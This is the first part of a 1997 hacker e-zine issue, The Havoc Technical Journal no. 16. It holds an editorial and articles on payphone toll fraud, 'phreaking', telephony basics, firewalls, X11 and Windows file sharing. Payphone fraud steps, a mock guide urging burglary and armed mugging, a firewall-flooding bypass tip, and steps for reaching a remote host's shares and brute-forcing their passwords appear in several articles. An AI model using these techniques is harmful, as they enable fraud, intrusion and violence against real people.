ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³The Havoc Technical Journal - http://www.thtj.com - ³± ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± vol.2 no.4 issue 16 ³ November 1st, 1997 ³ A thtj communications Publication ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ -³ the havoc technical journal issue 16 ³- ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Departments - total: 5k 5k Editorial..............................Scud-O 01 Phreaking - total: 16k 3k COCOTS.................................shamr0ck 02 7k Phreaking Techniques...................KungFuFox 03 6k Basics of Telephony....................AlienPhreak 04 Hacking - total: 51k 6k Basic Firewalls........................Onyx 05 6k X?.....................................³ntertia 06 3k Windows File Sharing Basics............Chameleon 07 31k PAM - Pluggable Authenication Modules..Scud-O 08 1k VPN's Demystified......................Meikon 09 4k LiteSpan 2000..........................XiLiCoN 10 Code - total: 11k 3k genericrack2.pas.......................The Messiah 11 2k genericrack2.c.........................Shok 12 2k word.c.................................memor 13 4k rm.c trojan Fix........................Shok 14 More Departments - total: 56k 18k Oddville, THTJ.........................Scud-O 15 38k The News...............................KungFuFox 16 ÄÄÄ Total: 145k Temporary site until thtj.com moves its nameservers -------> http://www.antionline.com/thtj/ <------ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ The THTJ Distribution Mailing List ³ ³ NOW UP! ÄÄÄÄÄÄÄÄ !PU WON ³ ³ majordomo@terminus.orc.ca ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ 'subscribe thtj' ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³the havoc technical journal - contacts³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ - Editor in Chief: Scud-O, scud@thtj.com - Executive Editor: KungFuFox, kungfufox@thtj.com - Submissions Editor: Keystroke, submissions@thtj.com - thtj email address: thtj@thtj.com - thtj website: http://www.thtj.com/ - thtj mailing address: PO BOX 448 Sykesville, MD 21784 Send All Articles to : submissions@thtj.com Submissions Info & Policy: http://www.thtj.com/submissions.html Distribution Info: http://www.thtj.com/distro.html To subscribe to The HAVOC Technical Journal, send mail to: majordomo@terminus.orc.ca, with no subject, and the body reading 'subscribe thtj' with out the quotes. Note that this majordomo is only for thtj distro. The open mailing list is coming soon. Subscribe to thtj online: http://www.thtj.com/subscribe.html The Havoc Technical Journal Vol. 2, No.4, November 1, 1997. A Havoc Bell Systems Publication. Contents Copyright (©) 1997 Havoc Bell Systems Publishing. All Rights Reserved. No part of this publication may be reproduced in whole or in part without the expressed written consent of The Editor in Chief for The Havoc Technical Journal. The Havoc Technical Journal does in no way endorse the illicit use of computers, computer networks, and telecommunications networks, nor is it to be held liable for any adverse results of pursuing such activities. The articles provided in this magazine are without any expressed or implied warranties. While every effort has been taken to ensure the accuracy of the information contained in this article, the authors, editors, and contributors of this zine assume no responsibility for errors, omissions, or for damages resulting from the use of the information contained herein. For infomation about using articles published in THTJ, send mail to: e-mail: thtj@thtj.com ³ mail: THTJ PO Box 448 Sykesville, MD 21784 NOTICE: if you are a government offical or employee reading this file, you MUST register with thtj. A registration permit will be mailed to you free of charge by using either of the mail addresses above. A Registration fee of $50 is required upon submission of the permit. This will entitle you to recieve thtj via a private mailing list, or via snail mail on a 3.5 floppy disk. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 01 of 16 Editorial: THTJ Needs You / Microsoft is Scared. By Scud-O, Editor in Chief scud@thtj.com THTJ Needs You! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Recently some of you out there have been saying what thtj needs to add to its format. You say, but you do not act. THTJ is not just made by the thtj staff, it is a zine made by the people, for the people. If you want to see something added to thtj, then work with us on it. Do it. THTJ currently has alot of matterial in it, but we have a serious shortage of phreaking articles that are submitted to us. While hacking is more popular than even, and hacking material is easy to come by, phreaking material is not. THTJ is working to become a medium for phreaking information, but we can not do it with out you. We urge you to help thtj and the underworld with phreaking materials. THTJ also has a seriuos shortage of the following type of articles: o NT Articles o Phreaking o UNIX Code o Crypto o VAX/Other OSes The thtj staff is currently working to get articles on these subjects, but we can not do it alone. Your submissions are critical. Your submissions are *very* important to us. You help make this zine run. Why write for thtj? Simple, thtj is one of the largest zines out there covering hacking, phreaking, coding, crypto, etc. THTJ has recieved worldwide coverage, and everyday thtj is reaching more people. Your name will be on peoples minds after thtj has included one of your articles. After 2 or more articles, you are eligable to be included on the thtj staff and receive some goodies from thtj.com, information before anyone else has it, meet the contacts and friends out there, and receive copies of thtj issues before anyone else does. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Microsoft is Scared ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ This month sees the release of Internet Explorer 4.0, and about a million lawsuits that followed it. The Justice Department is cracking down on Microsoft again, and Sun Microsystems is suing Microsoft for its use of Java. However, all this should not be a surprize to anyone. Microsoft has always practiced aggressive and unethical trade practices. And they did all this for good reason with IE4. Microsoft is scared. Why is the world's biggest company scared? They see the end of Microsoft, if they do not act right now. The WWW and the internet explosion took Microsoft by surprize. Look back 2 years ago, to the release of win95. The Microsoft Network was the big thing when win95 first hit the streets. MSN was very similar to AOL, everything was a new interface. Well, MS dismissed the WWW as a temporary fad. Well, this blew up in MS's face. They quickly released Internet Explorer 1.0 and 2.0, which were pathetic, when compared to Netscape. Even in verison 2.0 however, MS was making MS only html tags, and trying to get control of the HTML standard. With the new IE 4.0, MS is only expanging this control. MS is trying to take over the internet's most popular tool, the www. MS is also modding Java for obivous reasons. Java is a *huge* threat to MS. Java means that programs are not only platform independent, they are *OS* independent. MS has the control of the OS market, and they do not want to lose this. They bought out Web TV for the same reason. Web TV & Java == No need for a computer == No need for Microsoft. However, if Microsoft gains control of Java and Web TV, they can make these work for them, and they can gain even more of the population. Microsoft will tell you that they are the innocent big boy that everyone picks on, but this is pure bullshit. MS has always, and will always practice 'aggressive marketing methods'. Example: making IE be included with Win95 or, computer companies do not get Win95 for their machines. Example: MSN is on the desktop in Win95, Standard. The list goes on. MS is nowhere near innocent, they are guilty as sin. Do not feel sorry for them. Hell, do not feel sorry for any multi-billion dollar company. How can we stop MS from taking over the world? By mailing the President. The Vice-President. Your Congressperson. Your Senator. The Press. Anyone! This terror *must* stop, other wise we will not have a choice on 'Where we want to go today' Scud-O , Founder, and Editor in Chief of THTJ ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Scud-O and HBS would like to hear your views on this issue. Please feel free to e-mail us at: scud@thtj.com ---------------------------------------------- / ---/ --/ / / | /------/ / / /--- /-----/------/-----/ / / / /----------/ /--------/ -of HAVOC Bell Systems- scud@thtj.com ³ http://www.thtj.com ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 02 of 16 COCOTS By shamr0ck, Special to thtj shamr0ck@juno.com Introduction.. Today I'm going to show you some fun stuff you can do with COCOTs. (Customer-Owned Coin-Operated Telephones). COCOTs are payphones owned by individuals and private companies. COCOT payphones have been around for many years. The reason COCOTs are really hitting the market is because of the money. COCOT owners get to keep about 85% of the profits, the rest goes for taxes, and trust me thats A LOT. By 1991, there were more than 30,000 COCOTs in the New York State alone. Just think of how many are in the rest of the country. Yes, it's a very big industry. Some COCOTs out there are served by AOS (Alternate Operator Service) companies, such as US Sprint, AT&T and MCI, but they only serve them. Most COCOTs don't have their logo on them, although I have seen them on some. ALL COCOTs are required to provide a caller with access to the local exchange telephone company offering service within the area in which the call originates. Callers should be able to reach the long distance company of their choice by dialing 10xxx for AT&t, MCI, etc. Things to do with a COCOT You have to know what your looking for. COCOT payphones do not have any big name phone company logos on them. You can usually find them in big hotels, inside and outside of restaurants, and a bunch of other places. So you have found a COCOT. "Now what the fuck do I do with it?" You get on the phone and dial an 800 number and you tell them to fuck off. Then they hang up on you (don't call a telco 800 number or some fed office, dumbass). For about five secs you will hear a modem type sound. Yeah, thats the 1200bps modem inside the COCOT. After you hear that you should hear a dial tone. Now you can dial out with out paying a cent. On some COCOTs you have to dial using a radio shack tone dialer ($25) because they disable the keypad when there's no money in the coffer. "So I did that but it still doesn't want to work. What do I do now?" Well if you tryed dialing out using both the keypad and the tone dialer you are out of luck. I have seen the new COCOTs around, and they really suck. You can't dial out because they deaden the handset. Never give up though, there are still a lot of old COCOTs around. "Ok, I made a lot of calls using a COCOT. Who pays for it?" The owner of the pay phone does..if you really like that COCOT you shouldn't think you are 0-day (do not abuse the fraking cocot). If you abuse it you will: 1. Get cought.. they do get a phone bill and they do get the numbers you called on the bill..they are on the ESS. 2. The payphone will get taken away (make calls to france from N.Y. and talk for 10 hours a day; I think you know what I'm getting at) 3. Your mom will catch you and slap you around a bit with a large trout.. Good luck. -shamr0ck shamr0ck@juno.com ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Subscribe to The HAVOC Technical Journal Subscribe today and get the special rate of FREE! It's like getting 12 issues a year for free! ÄÄ send mail to: majordomo@terminus.orc.ca, with no subject and the body of the message reading 'subscribe thtj' with out the quotes. ÄÄ or sign up online: http://www.thtj.com/subscribe.html ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 03 of 16 Phreaking Techniques By KungFuFox, Executive Editor kungfufox@thtj.com Welcome to the wonderful world of phones! Do you wanna make phonecalls for free?! Do you wanna have lotsa fun at the expense of somebody else?! Do you wanna have a beigebox or a redbox, but don't even know what they are?! Read on k-rad kiddies! Lets start off with some basics, the kinda info you need to become a real phreak like the big boys! You gotta learn how to get free phonecalls! Lets start off with a pretty simple way, with a beigebox! I know you don't know what that is, it doesn't matter, I'll tell you how it works! Basically you get a phone, and you plug it into somebody else's house instead of yours! Don't have a phone? No problem! My poor man's beigebox works just as well, and all you need to use it is a rock! Either one from your home or from the location of your victim is fine. Get to the victim's place, preferrably at night, and find a window to a room you think has a good chance of having a phone in it, and chuck the rock at the window. Make sure you're not standing right next to the window when you do this, because it's liable to break, granted you don't have two broken arms to throw rocks with. If you can find a neighborhood filled with deaf people, or a slum where people hear windows breaking regularly, this phreaking technique is much more likely to work. Ok, now that the window is sufficiently removed, you need to get in there. Hopefully you picked a window that wasn't 10 feet off the ground. Climb on in there, making sure you don't peel the skin off your body, and look for a phone. Though you may be tempted, it isn't a good idea to turn on the lights when you start looking for that phone, obviously because turning on the lights is a lot more suspicious than breaking a window. Now for the complicated part. Once you've located the phone, you have to use a special technique to use it, because ma bell designed phones so you can't beige box with them at normal phone jacks. Rip the phone out of the wall, so that the plug on the end of the wire becomes separated from the wire. Bite off the plastic cover on the wire, and you'll see 2 or 4 wires inside it. You'll be dealing with the red and green wires. Strip away a couple inches of that colored insulation from those two wires. Now your beigehox is prepared for use. The only thing left to do is find a place to beige from. If this building you used your geolocial key to get into has a basement, you'll probably wanna go down there and look around for a plastic box mounted on a wall. It'll probably have a phone company insignia on it, most likely a generic bell shaped symbol, and a name with the word "bell" in it. Other possible names are "uswest", "ameritech", and "nynex". If this plastic box thing isn't in the basement, look around outside for it. It'll be on an outside wall somewhere around building. Once you find it, bash it good with your beigebox until it breaks open. You can use your feet and hands if you like. You could even use the rock you removed that window with if you can find it. Just make sure you bash the cover off that plastic box. Hopefully after all this work you'll be greeted with some screws in some strange geometric pattern. Hold the beigebox's handset up to your ear so you can hear it if it gets a dailtone, and start touching the red and green beigebox wires to different screws. After a few minutes if you don't have a dialtone, you're either retarded or the phoneline is disconnected. In the latter case, you'll need to goto another building, find another plastic box with a phone company insignia on it, and try the same procedure there. If you're just retarded, bash yourself in the head with the beigebox. It's probably angry at you anyway, for ripping it out of the wall. Another good way to make free phonecalls, and become an elite phreak, is to redbox. Don't know what a redbox is either? No sweat! I'll tell you how to get free calls just like a redbox does, but without the time consuming construction! First things first, you need to find a payphone. Any payphone will do, so long as it works. Don't believe any of the undercover telco people on irc that may tell you redboxes don't work. They do! Once you've found yourself a payphone, you need to get to get money to use it. Ha! I didn't mean your own money! That wouldn't be free! My first technique is something I'll call begging. To beg successfully, you'll need to look shabby. Don't shave if you're old enough that shaving matters, and don't comb your hair or whatever it is you normally do to it. Also, your worst clothes, slept in the night before your first redboxing day, is a good idea. Bring along a disposable cup, you can find one on the way if you need to, and go to that payphone. Now, when people walk by it, or walk up to use it, they're probably gonna have some change. Just sit there looking real pathetic and people are bound to start dropping as few coins as they can into your cup. Don't worry, even though they're cheapasses, eventually those small donations to your personal charity will add up. Once you've got like five bucks, you can start making calls, and they won't have cost you any money at all! My second technique, which is a much more effective method of obtaining funds, is something I like to call mugging. This will take some patience though, for you need to find the weakest person possible before attacking. Preferrably you should find somebody who wieghs a lot less than you do. Once you've found your anonymous donor, you may either knock them down, or simply grab them. Weapons such as guns and knives are excellent when implimented properly, to terrify your victim into submitting to your demands for money. Once you've acquired the funds that you feel are necessary to support your need to make free phonecalls, and become a better phreak, you may let them go, and get yourself to a phone, to start using that money. Ok now that you've acquired a couple tricks of the trade, get your lazy ass out there and phreak! ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 04 of 16 Basics of Telephony By AlienPhreak Surprisingly enough most phreakers don't even know the real basics of the telephone system. This article will outline the following features: POTS Trunks The Switching System PBXs (PABXs) The Plain Old Telephone System (POTS): The main part of the POTS is the actual telephone. The telephone requests network access by using a signalling method called loop start. When the telephone starts its session it's called "off hook" voltage, indicating the voltage being sent from the switch or CO through the 2-wire connection (red and green wires). Of course when you don't pick up the receiver the phone is on hook. When the telephone receives a call the network (switch) gives ring voltage out to the telephone (90 VAC over the DC voltage). Then you get those happy rings and you pick up the phone. For the phone to dial out you need a type of signaling. Before Dual Tone Multi-Frequency (DTMF), there was good ol' rotary or pulse dialing. DTMF is pretty much the standard these days on most switching systems. Pulse Dialing is still used in some areas. Another Signaling method is MF or Multi-Frequency. Like DTMF, MF is used on a few types of trunks and CCITT signaling. If you know anything about the old Blue Boxes, they used the KP, ST, R1-R2 signals, et cetera, which are actually MF signaling. Now the tricky part is converting speech into electrical signals. For the switching system to change your voice into signals, it uses Transmit Loudness Objective Rating (TLOR). For you to receive the signals the switch then sends out Receive Loudness Objective Rating (RLOR). Central Office (CO): In many phreaking articles you will see the acronym CO, which of course stands for Central Office. The CO is pretty much the center of all the local phone networks. It connects you to the rest of the world and all the other switches. The CO is a physical facility where all of the networking and routing switches are physically held. The trunks are what call the other trunks within other COs (where the trunk directs or "routes" your call depends on where you are calling to). There is no main purpose of the CO besides housing all of the computers, trunks, and line-cards associated with the local network. The Switching System: The first major independent switching system was Step-by-Step (SxS) switching. SxS was run by electro-mechanical switches. It is now a rather archaic system but is still used in some places. Dial pulses would be used to cause the switches to select switch groups until the full number was dialed. Crossbar Switching (XB) was the next electro-mechanical switching system to come into play. The XB system was set up much differently than SxS. It used a matrix of connectors arranged in a grid to form its connection scheme. ESS was the first non-mechanical switching system. It provided many more features than the basic calling system of SxS. ESS could handle both pulse dialing and DTMF signaling. The main ESS, which used the 1A processor, was easily upgradable to 1ESS. The processor also controlled 4ESS, allowed it to be easily upgraded, and ran in real time. 5ESS is almost the "industry standard switch" of today, and is far superior to Nortel's DMS switches. The 5ESS is manufactured by AT&T and is used by almost every RBOC (Regional Bell Operating Company). The 5ESS's are almost entirely unix based, though it is very different from the unix systems you or I run. It has many more features and is set up by AT&T for their routing and channeling. Private Branch Exchanges (PBXs): The PBX is almost like a miniature switch. It controls a small area like a business or a school phone system. The point of a PBX system is for companies to use as few telephone lines as necessary to get the most out of their telecommunications budgets. If you have 100 people and 100 phones, the fact is not all 100 people are going to be using the fones at the same exact time. PBX systems provide switching of in-house calls, and "pool" the outside lines. There are many functionalities of the PBX, such as paging systems and voice mail boxes (VMBs). There are many neat things a phreaker can do to with a PBX. Some PBXs are set up so that someone can call in and they will get an automatic dial tone. After that they enter a code and the user is allowed to dial out, with the call being billed to the company that owns the PBX. Of course this can be abused, along with the VMB. PBX networking can be very complex. I will only cover one type of Switched Services Network (SSN). An Electronic Tandem Network happens to be what my private school phone system uses. It's set up in the manner that all lines (extensions) have a three digit address. Automatic routing can take place within the private network. This SSN is setup on a privatly owned trunk so that the company or school can set it up however they would like. Trunk Signaling: Due to time constraints I can only talk about one type of trunk signaling, the Single Frequency (SF). SF signaling is used on all 4 wire analog systems. SF is a type of 'inband' signaling scheme where all information is transmitted in the voice band. SF uses 2600hz and 2280hz signals to transmit data. When the trunk is in an on-hook state the 2600hz or 2280hz tone is used to connect to the remote site. When the trunk is in an off-hook state the 2600hz or 2280hz tone is dropped. SF units can pass dial pulse address signaling at speeds from 8 to 12 (pulses per second) PPS with 56 to 69 percent break. *2280hz is only used in British Telecom's trunks. This concludes my article on the basics of the telefone system. If you see anything wrong with this article or just want to comment on it please email me at alienphreak@linenoise.org. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 05 of 16 Basic Firewalls by Onyx Part1 I am writing this article to basically confirm and dispell ideas about firewalls. The first section is for people who just want the jist of what a firewall is the second section is more technical Most people ,espescially hackers, consider firewalls a very big threat and make them to be something they are not. First lets define one in the simplest terms. A firewall is a computer sitting between your network and the Internet that runs special software to keep people out. That's it in the simplest terms. Firewalls can be configured in several ways and doesn't have to be on a seperate computer that only runs the firewalls software. Lot's of times a so called "poor man's firewall" can be configured by using a computer that is also used for other applications. Most of the time a firewall setup looks something like this (forgive the crude drawing) > Network-------Web Server----Firewall>----Internet or > > Network-------Firewall>-----Webserver----Internet > In the first example everything is behind the firewall, thus theoretically your network and web server are behind the firewall. In the second example your web server is vulnerable to attack, but even if you manage to breach the web server's security to get to the Network you still need to get past the firewall. The second configuration I consider more safe although others will argue differently (it is sometimes referred to as the "sacrificial lamb" configuration because you are "sacrificing" your web server). Getting back to what a firewall does. A firewall is designed to block access to certain things. Most of the time this is based on domain, which leads to one insecurity which I will get to later. As an example lets use the site, secure.com. Say secure.com decides to setup a firewall that denies access to port 23 (telnet) to everyone except to those who are apart of a certain domain. Now most of the time companys are too cheap and don't want to pay for expensive firewall's. So to get access the easiest way is to ping the firewall so it gets too lagged to check who you are and just drops to the desired service. This ONLY works for cheap firewalls. Some sites who know nothing of computer security and assume someone trying to break into their site know virtually nothing also (idiots) have tried to setup stupid "fake" firewalls. I ran into a site which will remain anonymous that to , deter hacking attempts, said on the login screen that this was something something firewall blah blah blah. Well anyway it wasn't a firewall and they were just trying to scare people into thinking it was so hackers would leave their site alone...didn't work for me =) So trying not to get to technical here, a firewall that checks access to a service through domains can be spoofed. If you would like to know about spoofing their are plenty of articles out there for you to read. Section 2 People who are interested in more technical details read on: This will be a more in-depth description of a firewall. People throw the word firewall around a lot and don't know exactly what constitutes one and what kinds their are. Most firewalls are screening routers. They provide packet filtering and work with the lower level of the network protocol stack. Another type is known as a proxy server gateway (I know it sounds imposing). They preform basic proxy services for external networks for internal users. These actually look at the data INSIDE packets. And finally the third type uses what is known as a stateful inspection technique. Firewalls are most often built ontop of routers and routers intern are used with gateways offering high-end protection. Here is another crappy diagram which depicts a screening router NOT a proxy server! | Internet----------->|---------- | <------------|----------User |=Screening Router | A proxy server looks SIMILAR, but not EXACTLY the same. Instead of just some simple uncomplicated software proxy servers are actual computer(s) that run ONLY special proxy software. Another thing I would like to point out about firewalls are that they are basically a newly *implemented* technology. The technology , however, has been around for a while. Since the implimentation of the TCP/IP protocol. All that was required to develop them was some smart thinking. One of the recent developments was allowing video and audio conferences through firewalls. Before to allow this people had to setup the firewall so that it didn't utilize it's full potential for protection. When a person decides that they want a firewall they have to decide what services they want to offer. I know this will sound stupid, but u CAN setup finger to work through a firewall. Now I don't know exactly why you would want this except if you wanted your users and every other person on the net to know who is currently logged onto your network. Some of the services you can use through a firewall are: Telnet FTP HTTP Finger (sigh) Gopher-Archie Their is one more. X. Now I know those of you who are familiar with X security will be plotting in your evil little minds now (hehehe). Well anyway if you aren't familiar with X what you should at the very least know is that it is very insecure. One of the major problems with it is that users can monitor your keystrokes. In some instances you can ,over a telnet proxy, start a virutal x server. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 06 of 16 X? By ³ntertia, Special to thtj inertia@webzone.net In general, when one thinks of an operating system that has a graphical user interface, one thinks Microsoft Windows, not the X Windows System. This person is missing out. Here, I will attempt to explain X and it's counterparts, such as the XFree86 Project... along with with many examples of why X is better than everything else. My technical experience is limited to Linux, so XFree86 and how to successfully implement it on your OS will be the bulk of this article. So what exactly is "XFree86?" XFree86 is the focus of the XFree86 project, developed to provide a GUI for Linux, OpenBSD, and OS2, among many others. X along with a good window manager (a window manager provides the GUI and sets the level of configuration for your environment, along with providing you a means of control) makes Windows 95 look like total crap. X has yet to reach the level of user-friendliness that Windows has, but hell, we're talking about Linux here, not DOS. When you get familiar with X then that Win95 partition is outta here. ;] Enough background and opinions, let's take it to another level, shall we? So now that you know about X... it's time to pay attention to where it lies in your HDD. (From now on we're talkin Linux only, X11R6, the current version) X is drawn from /usr/X11R6 to make it simple, this is where X and all of it's accessories, games, etc. are located. This makes X easily accessible, since it's not thrown into other directories, e.g. /usr/X11R6/bin instead of /bin. Now that the general location has been determined, you might wonder which files are important or which files do what on your system. Keep reading. X, like anything else, has proprietary commands, that cannot be successfully executed without an X display open. If you are new to linux, at the shell prompt type startx to begin an X session, or if you prefer an X login prompt to skip over multiuser mode completely then edit the initial runlevel to 5 in /etc/inittab. To change video card settings etc, run the command Xconfigurator in a shell or in X itself. Sorry if the instructions are vague but the intention of this is not to show you how to run X, but to explain in an understandable manner the unique attributes and advantages of the system and provide general information on how to better understand how it works. You cannot, of course, open Netscape while inside a shell... you can inside of an Xterm in X (an Xterm is simply a shell emulator that is run through X) but otherwise it is impossible. Naturally, these proprietary commands are all GUI programs, but many are very powerful. Now is the time that I could go into the people who say they hate Windows because it's the cool thing to say, haha, but I at least have valid reasons for picking X over Windows any day. Don't be stupid and think that just because you are provided a GUI, the program is weak, because, well, you would be wrong. For example, there is an XFree86 driven kernel hacker, Xconfig. If you run X, next time you recompile your kernel type make xconfig instead of make config. The organization of the XFree86 system and it's identifying commands have been mentioned, now we will look at how it comes together. Upon startup, the .xinitrc file is read. Here is my .xinitrc: #!/bin/sh # Turbo Linux XINITRC by Scott Stone (sstone@turbolinux.com) userresources=$HOME/.Xresources usermodmap=$HOME/.Xmodmap sysresources=/usr/X11R6/lib/X11/xinit/.Xresources sysmodmap=/usr/X11R6/lib/X11/xinit/.Xmodmap # merge in defaults and keymaps if [ -f $sysresources ]; then xrdb -merge $sysresources fi if [ -f $sysmodmap ]; then xmodmap $sysmodmap fi if [ -f $userresources ]; then xrdb -merge $userresources fi if [ -f $usermodmap ]; then xmodmap $usermodmap fi # # Programs & Window Managers # #xsetroot -solid gray7 & #xterm -T 'Login Shell' -ls & #xbiff -update 5 -geometry +5-5 & # Uncomment this line if you want other machines to be able # to open windows on your machine (by default): xhost + # Start up a window manager - only one of these lines should be # un-commented. afterstep #fvwm #fvwm95-2 EOF The file in itself keeps things nice and simple... as you can see, it sets the paths to a couple of other initialization files, reads them (.Xmodmap and .Xresources), provides you with an option to let others access X on your computer, and then looks for a window manager to start up with. Along with these initial functions, the window managers have their own initialization files to be read. To go into that would be overkill at this point. The system has been configured and all ready to start up... but what happens when it is not successfully run? Next we will go into common, even frequent, errors that you will most likely face at some point in time. One of the simplest problems to overcome is an improper video card or color/resolution specification. This can be fixed by running Xconfigurator or simply passing arguments to the command line, such as startx -- -bpp 24, which will start X in 24 bit color mode, replace 24 with 8, 16, etc. to meet your own needs. Invalid settings have, personally, caused 90% of the problems that I have with X. A common error message for this is "server is already running, blah blah blah." Another error is "unable to access security policy etc." That, I have heard, is a bogus message in some versions of X11R6, and can be fixed most easily through re-installation, if you can call that easy maintenance. In conclusion, X is a durable, and surprisingly enough, easy to use system. The level of control you have over is amazing to the typical Windows user, and is well worth the time to check out. I would like to go into higher detail, but I don't really have the time to write such a large document at once that would include color tables, a little source, and VERY cool feature, hosting X applications to a remote user. If you have any suggestions to a good continuation to this article feel free to email me. Peace... inertia@webzone.net ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 07 of 16 Windows File Sharing Basics By Chameleon, Special to thtj Chameleon@intercore.com.ar Now to you nt gurus this is all very basic but since most of you are unix hackers you probably dont know shit about windows. It is a must to start learning windows now. NT is getting big. More and more each day people are starting to use it. Yes I agree I hate NT and love a good ol unix box but we must keep up with technology. NT is widely used even by places like the Pentagon. (*caugh*it was easy to hack*caught*) Ok class lets start... Say you have an IP address that you want to try and get access to you would do this Example for IP address: 194.8.235.73 Note: Use IP addresses because the name address sometimes wont work and the IP will so use IP addresses. Drop to dos: c:\windows> nbtstat -A 194.8.235.73 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- MAILGATE <00> UNIQUE Registered MAILGATE <03> UNIQUE Registered MAILGATE <1F> UNIQUE Registered MAILGATE <20> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MIRAGE <00> GROUP Registered MIRAGE <1D> UNIQUE Registered MIRAGE <1E> GROUP Registered MAC Address = 00-00-00-00-00-00 ---------------------------------------------------------------------------- |Note: this will list the remote hosts name. The name is set in the | |control pannel/networking/indentification/computername. | ---------------------------------------------------------------------------- Now that you have the computer name you need to tell windows the IP that maps to that computer name. So to do this you need to edit c:\windows\lmhosts open it in notepad or whatever. It will look like this... 127.0.0.1 localhost you want to add the ip 194.8.235.73 and then press tab and enter the computer name. so the new hosts file will look like this. 127.0.0.1 localhost 194.8.235.73 MAILGATE This sets up a computer name mapping to the IP address of the computer to try and get into its filesharing. Save this and then click your Start Button then goto find, then computer, then enter the computer name and it will connect to that computer name that you added into the hosts file. It should show the computer as being found. Double click it and then if your lucky it wont have a password but if you arent you will be prompted for a password which you will have to try and guess or use a brute force cracking program. Hope this was a little help. If not at least you know how to use windows file sharing... Anyone good at codeing in windows? Wana code a brute force hacking program for windows file sharing? E-Mail me. Laterz Chameleon Chameleon@intercore.com.ar InterCore Security Corp. http://chameleon.core.com.ar http://www.intercore.com.ar irc.intercore.com.ar ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Write for THTJ. 